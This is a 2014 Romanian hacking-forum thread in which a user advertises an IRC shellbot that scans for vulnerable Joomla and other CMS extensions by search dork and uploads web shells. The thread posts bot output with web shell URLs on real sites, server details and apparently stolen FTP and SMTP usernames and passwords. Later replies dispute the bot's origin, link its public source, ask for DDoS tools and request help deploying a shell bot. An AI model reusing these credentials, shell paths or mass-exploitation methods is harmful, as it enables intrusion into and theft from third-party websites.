cPanel Posted January 4, 2014 Report Share Posted January 4, 2014 (edited) Jce Shell uploader: !jce [dork] Civi Vuln: !civi [dork] Acy Vuln Uploaded: !acy [dork] JnewsLetter Vuln: !jnewsletter [dork] Jinc Vuln: !jinc [dork] Maianmedia Vuln: !mai [dork] Jnews Vuln: !jnews [dork] Redmystic Vuln: !red [dork] PhpVMS Vuln: !vms [dork] ClipBucket Vuln: !cbk [dork] Slimstat Vuln: !slim [dork] invit0r Vuln: !inv [dork] Seo Watcher Vuln: !seo [dork] OpenEmr Vuln: !emr [dork] ----scanezi si iti da shelul, pe bugul acela.Un Mic Test :-=(16:00:29)=- <@cPanel> !jce /images/stories/ +partners-=(16:00:29)=- <@Jt> Private JCE source!-=(16:00:29)=- <@JT> (Jce) Dork: /images/stories/ +partners-=(16:00:29)=- <@JT> (Jce) Search Engine Loading ...Si logurile ti le da pe chan/prvExample : -=(16:08:29)=- <JT> (Jce) Kenya .::Predator::. MoDe:ON -=(16:08:29)=- <JT> (Jce) Kenya .::Predator::. MoDe:ON -=(16:10:48)=- <JT> (Jce) <> MaMa <>(@SheLL) IAM - DNSNET (SafeMode=OFF) (OS=Linux hosting2.reymann.com 2.6.32-54-server #116-Ubuntu SMP Tue Nov 12 19:37:57 UTC 2013 x86_64) (uid=33(www-data) -=(16:10:48)=- <JT> (Jce) <> FTP <> ftp://www.paris-store.com/ [ 127.0.0.1 21 paris-store_ftp.paris-store hoopla08 ] -=(16:10:50)=- <JT> (Jce) <> SMTP <> ftp://www.paris-store.com/ [ smtp.reymann.com 25 smtp rey ] -----Botul are functia de ati scoate smtp/ftp din shelul prins !Cine o vrea si un o explicatie cum ruleaza PM<JT> (Jce) <> GooGLe <>(@SheLL) http://www.bieneskatzenwelt.de//images/stories/plnt2.php (SafeMode=OFF) (OS=Linux h1867540.stratoserver.net 2.6.32-042stab078.27 #1 SMP Mon Jul 1 20:48:07 MSK 2013 i686) (uid=33(www-data) <JT> (Jce) <> FTP <> ftp://www.bieneskatzenwelt.de/ [ 127.0.0.1 21 admin 2002Minotaurus1979 ] <JT> (Jce) <> SMTP <> ftp://www.bieneskatzenwelt.de/ [ smtp.udag.de 25 bieneskatzenweltde-0001 4b!ene5 ] Edited January 6, 2014 by cPanel Quote Link to comment Share on other sites More sharing options...
aelius Posted January 4, 2014 Report Share Posted January 4, 2014 Asta NU este:- Exploit- POC- Bot-ul tau nu ruleaza pe mirc, si pe IRCTot ce vedem aici e o simpla balarie. Pune sursa, asa se lucreaza aici.E un simplu shellbot scris in perl. Quote Link to comment Share on other sites More sharing options...
cPanel Posted January 4, 2014 Author Report Share Posted January 4, 2014 @tex : ok , multumesc pentru corectarea pe care ai facut-o . Cum am mai zis PM , nu o fac publica.Poate o face publica altu , dar nu cam merita facuta publica, este prea "frumoasa" sa fie publica facuta. Quote Link to comment Share on other sites More sharing options...
cPanel Posted January 4, 2014 Author Report Share Posted January 4, 2014 (edited) Este inca UP - Topicul...YaHoo www.uhal.sk - BOFF 1.0 FreeBSD dw8.nameserver.sk 9.1-STABLE FreeBSD 9.1-STABLE #0: Thu Feb 14 07:52:40 CET 2013 root@gw.nameserver.sk:/usr/obj/usr/src/sys/kernconf amd64-=(16:51:55)=- <JxBot> (Jce) SeZNam http://www.katcinasmecka.cz//images/stories/iam.php -=(17:47:29)=- <JxBot> (Jce) BigLobe http://www.pwsb.poznan.pl//images/stories/0day.php -=(17:50:39)=- <JxBot> (Jce) UoL http://www.pwsb.poznan.pl//images/stories/0day.php -=(17:52:17)=- <JxBot> (Jce) YaHoo http://www.agridept.gov.lk//images/stories/0day.php -=(17:55:59)=- <JxBot> (Jce) YaHoo http://www.gaictech.com//images/stories/0d4y.php MoDe:ONOFF : un bug sa scanez care da .. ii voi posta shelurile in Pm lui ! Edited January 4, 2014 by cPanel Quote Link to comment Share on other sites More sharing options...
aelius Posted January 4, 2014 Report Share Posted January 4, 2014 (edited) Pai este publica sursa. Nu este facuta de tine. Daca o vinzi sau o dai contra unui schimb, posteaza te rog la RST Market, nu aici.Categoria asta este facuta pentru altceva: https://rstforums.com/forum/exploituri-si-pocs.rstsource: http://pastebin.com/raw.php?i=1SvVhNfUMi-am adus aminte de o chestie apropo de asta cu "scanner privat". Pe vremuri era un hunedorean ratat ce ne cerea exploit-uri sau scannere si scria el in scripturi "Powered by Zerg", apoi le publica pe net. Edited January 4, 2014 by aelius Quote Link to comment Share on other sites More sharing options...
cPanel Posted January 4, 2014 Author Report Share Posted January 4, 2014 @Tex : Arhive de genul acela... gasesti peste google ( free ) si sti si tu tot ce este free cam nu este bun ..off : cum mut atuncea postarea "unde trebuie"ON : Rog un admin sa mute atuncea postul facut de mine unde trebuie ... Quote Link to comment Share on other sites More sharing options...
cPanel Posted January 5, 2014 Author Report Share Posted January 5, 2014 (edited) Rog un admin sa inchida postul!ON : Topic Inchis !!! Edited January 6, 2014 by cPanel Quote Link to comment Share on other sites More sharing options...
wind Posted January 15, 2014 Report Share Posted January 15, 2014 Prinde prostii, sursa ai gasit-o pe ceva forumuri straine, si tu vii sa vinzi gogosi, oricum, bafta la fraieri ! Quote Link to comment Share on other sites More sharing options...
kumudam Posted January 18, 2014 Report Share Posted January 18, 2014 sunt si eu interesat de shells -o sa incerc chestia Quote Link to comment Share on other sites More sharing options...
MajesticRol Posted February 3, 2014 Report Share Posted February 3, 2014 Are cineva de ddos si nu de udp ? Quote Link to comment Share on other sites More sharing options...
magnum Posted February 3, 2014 Report Share Posted February 3, 2014 Are cineva de ddos si nu de udp ?Teoretic (si practic) mai multi boti = ddos. Unul singur e dos. Udp e doar un protocol ca si tcp. Ce vrei tu mai exact? Quote Link to comment Share on other sites More sharing options...
staicut Posted June 1, 2014 Report Share Posted June 1, 2014 Salut tuturor am si eu o intrebare cine are bunavointa sa ma ajute si pe mine sa urc un boot de shell pe canalul de mirc ???am root dar nu stiu cum sa il urc?Am platit pe cineva sa imi arate si mi-a dat teapa.Va rog macar niste indicatii linkuri etc.Va multumesc din suflet Quote Link to comment Share on other sites More sharing options...